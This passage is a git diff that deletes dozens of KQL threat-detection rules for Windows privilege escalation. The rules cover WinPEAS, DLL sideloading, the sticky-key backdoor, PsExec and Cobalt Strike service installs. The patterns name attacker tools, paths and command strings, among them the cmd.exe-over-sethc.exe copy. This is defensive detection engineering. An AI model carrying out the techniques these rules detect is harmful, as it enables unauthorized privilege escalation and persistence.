-// Level: high
-// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz
-// Tags: attack.privilege_escalation, attack.t1082, attack.t1087, attack.t1046
-DeviceProcessEvents
-| where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Interactive_AT_Job.kql b/Privilege Escalation/Interactive_AT_Job.kql
deleted file mode 100644
index 47f1d4f1..00000000
--- a/Privilege Escalation/Interactive_AT_Job.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Detects an interactive AT job, which may be used as a form of privilege escalation.
-// Tags: attack.privilege_escalation, attack.t1053.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "interactive" and FolderPath endswith "\\at.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation.kql b/Privilege Escalation/LiveKD_Driver_Creation.kql
deleted file mode 100644
index 7e5f529f..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: medium
-// Description: Detects the creation of the LiveKD driver, which is used for live kernel debugging
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe") and FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS"
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql b/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql
deleted file mode 100644
index 69e1685e..00000000
--- a/Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of the LiveKD driver by a process image other than "livekd.exe".
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\drivers\\LiveKdD.SYS" and (not((InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livek64.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql b/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql
deleted file mode 100644
index 003653f9..00000000
--- a/Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/16
-// Level: high
-// Description: Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\livekd.dmp"
\ No newline at end of file
diff --git a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql b/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql b/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Privilege Escalation/Microsoft_Office_DLL_Sideload.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_Group_Policy_Settings.kql b/Privilege Escalation/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Privilege Escalation/Modify_Group_Policy_Settings.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql b/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql
deleted file mode 100644
index 7fba55a2..00000000
--- a/Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: high
-// Description: Detect modification of the startup key to a path where a payload could be stored to be launched during startup
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" and RegistryKey endswith "Startup"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql b/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql
deleted file mode 100644
index 1dbdb0cb..00000000
--- a/Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: medium
-// Description: Detects creation of a new service (kernel driver) with the type "kernel"
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql b/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql
deleted file mode 100644
index ce9fb3fa..00000000
--- a/Privilege Escalation/New_Service_Creation_Using_PowerShell.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using powershell.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql b/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql
deleted file mode 100644
index dd56c1e4..00000000
--- a/Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2023/02/20
-// Level: low
-// Description: Detects the creation of a new service using the "sc.exe" utility.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql b/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql
deleted file mode 100644
index ef12160b..00000000
--- a/Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
-Adversaries may abuse time providers to execute DLLs when the system boots.
-The Windows Time service (W32Time) enables time synchronization across and within domains.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1547.003
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Services\\W32Time\\TimeProviders" and RegistryKey endswith "\\DllName") and (not((RegistryValueData in~ ("%SystemRoot%\\System32\\vmictimeprovider.dll", "%systemroot%\\system32\\w32time.dll", "C:\\Windows\\SYSTEM32\\w32time.DLL"))))
\ No newline at end of file
diff --git a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql b/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql
deleted file mode 100644
index 4e6050fc..00000000
--- a/Privilege Escalation/PUA_-_AdvancedRun_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: medium
-// Description: Detects the execution of AdvancedRun utility
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ")
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql
deleted file mode 100644
index c00dd12f..00000000
--- a/Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/20
-// Level: high
-// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11"))
\ No newline at end of file
diff --git a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql b/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql
deleted file mode 100644
index 1282a6c6..00000000
--- a/Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/02
-// Level: high
-// Description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)
-// Tags: attack.execution, attack.privilege_escalation, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-u System" or ProcessCommandLine contains "-uSystem" or ProcessCommandLine contains "-u TrustedInstaller" or ProcessCommandLine contains "-uTrustedInstaller" or ProcessCommandLine contains " --ti ") or (FolderPath endswith "\\wsudo.exe" or ProcessVersionInfoOriginalFileName =~ "wsudo.exe" or ProcessVersionInfoFileDescription =~ "Windows sudo utility" or InitiatingProcessFolderPath endswith "\\wsudo-bridge.exe")
\ No newline at end of file
diff --git a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql b/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql
deleted file mode 100644
index 0e968bc4..00000000
--- a/Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz @bczyz1, oscd.community
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects value modification of registry key containing path to binary used as screensaver.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql b/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql
deleted file mode 100644
index 17643f89..00000000
--- a/Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Sreeman
-// Date: 2020/02/18
-// Level: critical
-// Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.
-When the sticky keys are "activated" the privilleged shell is launched.
-
-// Tags: attack.t1546.008, attack.privilege_escalation
-DeviceProcessEvents
-| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "/y " and ProcessCommandLine contains "C:\\windows\\system32\\cmd.exe C:\\windows\\system32\\sethc.exe"
\ No newline at end of file
diff --git a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql
deleted file mode 100644
index 8867fa02..00000000
--- a/Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov
-// Date: 2019/10/26
-// Level: high
-// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql b/Privilege Escalation/Potential_7za.DLL_Sideloading.kql
deleted file mode 100644
index f1cc961b..00000000
--- a/Privilege Escalation/Potential_7za.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/06/09
-// Level: low
-// Description: Detects potential DLL sideloading of "7za.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql b/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql
deleted file mode 100644
index e192e978..00000000
--- a/Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "AVKkid.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql b/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql
deleted file mode 100644
index 000b03f0..00000000
--- a/Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql b/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql
deleted file mode 100644
index 49da9307..00000000
--- a/Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Den Iuzvyk
-// Date: 2020/07/15
-// Level: low
-// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
-An attacker can use this to authenticate to Azure AD in a browser as that user.
-
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql
deleted file mode 100644
index 1c5d0f3d..00000000
--- a/Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql b/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql
deleted file mode 100644
index 7d335d90..00000000
--- a/Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/07/13
-// Level: medium
-// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql b/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql
deleted file mode 100644
index 4ca5d408..00000000
--- a/Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
